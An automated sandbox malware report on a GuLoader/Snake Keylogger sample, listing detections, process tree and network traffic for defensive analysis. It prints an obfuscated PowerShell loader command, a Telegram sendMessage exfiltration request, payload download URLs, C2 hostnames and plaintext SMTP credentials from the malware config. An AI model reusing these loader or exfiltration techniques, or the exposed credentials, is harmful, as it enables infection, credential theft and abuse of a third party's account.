Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bddTkmucZP.exe

Overview

General Information

Sample name:bddTkmucZP.exe
renamed because original name is a hash value
Original sample name:bf7d6c1e7c5dec1d0607af05b35ea434a0fce86d8ae05c3d3f1dba9039f000cb.exe
Analysis ID:1634851
MD5:30f172e21721950196246b8a06ecd970
SHA1:9f7585097b4ecc9a41592a247c41c52e8ab4e5a4
SHA256:bf7d6c1e7c5dec1d0607af05b35ea434a0fce86d8ae05c3d3f1dba9039f000cb
Tags:exesignedVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • bddTkmucZP.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\bddTkmucZP.exe" MD5: 30F172E21721950196246B8A06ECD970)
    • powershell.exe (PID: 4124 cmdline: "powershell.exe" -windowstyle minimized "$Kabelforbindelsernes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Frontalangreb.Kon237';$Preaccommodating=$Kabelforbindelsernes.SubString(11763,3);.$Preaccommodating($Kabelforbindelsernes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 2700 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 4144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "info@muriana.com", "Password": "Provisional123***", "Host": "mail.muriana.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.1524381754.000000000BA44000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 2700JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 2700JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2700, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 58290
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4124, TargetFilename: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Kabelforbindelsernes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Frontalangreb.Kon237';$Preaccommodating=$Kabelforbindelsernes.SubString(11763,3);.$Preaccommodating($Kabelforbindelsernes)", CommandLine: "powershell.exe" -windowstyle minimized "$Kabelforbindelsernes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Frontalangreb.Kon237';$Preaccommodating=$Kabelforbindelsernes.SubString(11763,3);.$Preaccommodating($Kabelforbindelsernes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\bddTkmucZP.exe", ParentImage: C:\Users\user\Desktop\bddTkmucZP.exe, ParentProcessId: 6740, ParentProcessName: bddTkmucZP.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Kabelforbindelsernes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Frontalangreb.Kon237';$Preaccommodating=$Kabelforbindelsernes.SubString(11763,3);.$Preaccommodating($Kabelforbindelsernes)", ProcessId: 4124, ProcessName: powershell.exe
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4144, ProcessName: svchost.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-11T05:47:56.204581+010028033053Unknown Traffic192.168.2.758294104.21.80.1443TCP
          2025-03-11T05:47:59.145664+010028033053Unknown Traffic192.168.2.758296104.21.80.1443TCP
          2025-03-11T05:48:05.026516+010028033053Unknown Traffic192.168.2.758300104.21.80.1443TCP
          2025-03-11T05:48:08.011044+010028033053Unknown Traffic192.168.2.758302104.21.80.1443TCP
          2025-03-11T05:48:16.756691+010028033053Unknown Traffic192.168.2.758308104.21.80.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-11T05:47:50.632385+010028032742Potentially Bad Traffic192.168.2.758292158.101.44.24280TCP
          2025-03-11T05:47:53.741671+010028032742Potentially Bad Traffic192.168.2.758292158.101.44.24280TCP
          2025-03-11T05:47:56.913626+010028032742Potentially Bad Traffic192.168.2.758295158.101.44.24280TCP
          2025-03-11T05:47:59.819844+010028032742Potentially Bad Traffic192.168.2.758297158.101.44.24280TCP
          2025-03-11T05:48:02.601052+010028032742Potentially Bad Traffic192.168.2.758299158.101.44.24280TCP
          2025-03-11T05:48:05.726211+010028032742Potentially Bad Traffic192.168.2.758301158.101.44.24280TCP
          2025-03-11T05:48:08.679217+010028032742Potentially Bad Traffic192.168.2.758303158.101.44.24280TCP
          2025-03-11T05:48:11.580738+010028032742Potentially Bad Traffic192.168.2.758305158.101.44.24280TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-11T05:47:43.913832+010028032702Potentially Bad Traffic192.168.2.758290216.58.206.78443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-11T05:48:19.554015+010018100071Potentially Bad Traffic192.168.2.758309149.154.167.220443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: bddTkmucZP.exeAvira: detected
          Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exeAvira: detection malicious, Label: TR/Injector.cgeez
          Source: 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@muriana.com", "Password": "Provisional123***", "Host": "mail.muriana.com", "Port": "587", "Version": "4.4"}
          Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exeVirustotal: Detection: 74%Perma Link
          Source: bddTkmucZP.exeVirustotal: Detection: 74%Perma Link
          Source: bddTkmucZP.exeReversingLabs: Detection: 52%

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: bddTkmucZP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:58293 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:58290 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.7:58291 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:58309 version: TLS 1.2
          Source: bddTkmucZP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 029DF45Dh11_2_029DF2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 029DF45Dh11_2_029DF4AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 029DFC19h11_2_029DF961

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:58309 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.7:58280 -> 162.159.36.2:53
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:08:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:58295 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:58297 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:58303 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:58299 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:58301 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:58292 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:58305 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:58290 -> 216.58.206.78:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58302 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58308 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58294 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58296 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58300 -> 104.21.80.1:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1GVXvn_52j7eFi-92nW0n-Wxm1UWtG8b9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1GVXvn_52j7eFi-92nW0n-Wxm1UWtG8b9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:58293 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1GVXvn_52j7eFi-92nW0n-Wxm1UWtG8b9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1GVXvn_52j7eFi-92nW0n-Wxm1UWtG8b9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:08:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 04:48:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 0000000B.00000002.2134400655.0000000026AF5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: powershell.exe, 00000001.00000002.1518294671.0000000007B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: svchost.exe, 00000004.00000002.2112447469.0000022BB7200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: svchost.exe, 00000004.00000003.1203225720.0000022BB7060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: bddTkmucZP.exe, 00000000.00000000.842811185.000000000040A000.00000008.00000001.01000000.00000003.sdmp, bddTkmucZP.exe, 00000000.00000002.928814969.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1512682110.0000000003578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000001.00000002.1513466927.0000000005471000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1512682110.0000000003578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000001.00000002.1518294671.0000000007B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
          Source: powershell.exe, 00000001.00000002.1513466927.0000000005471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20a
          Source: msiexec.exe, 0000000B.00000003.1688467739.0000000008D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
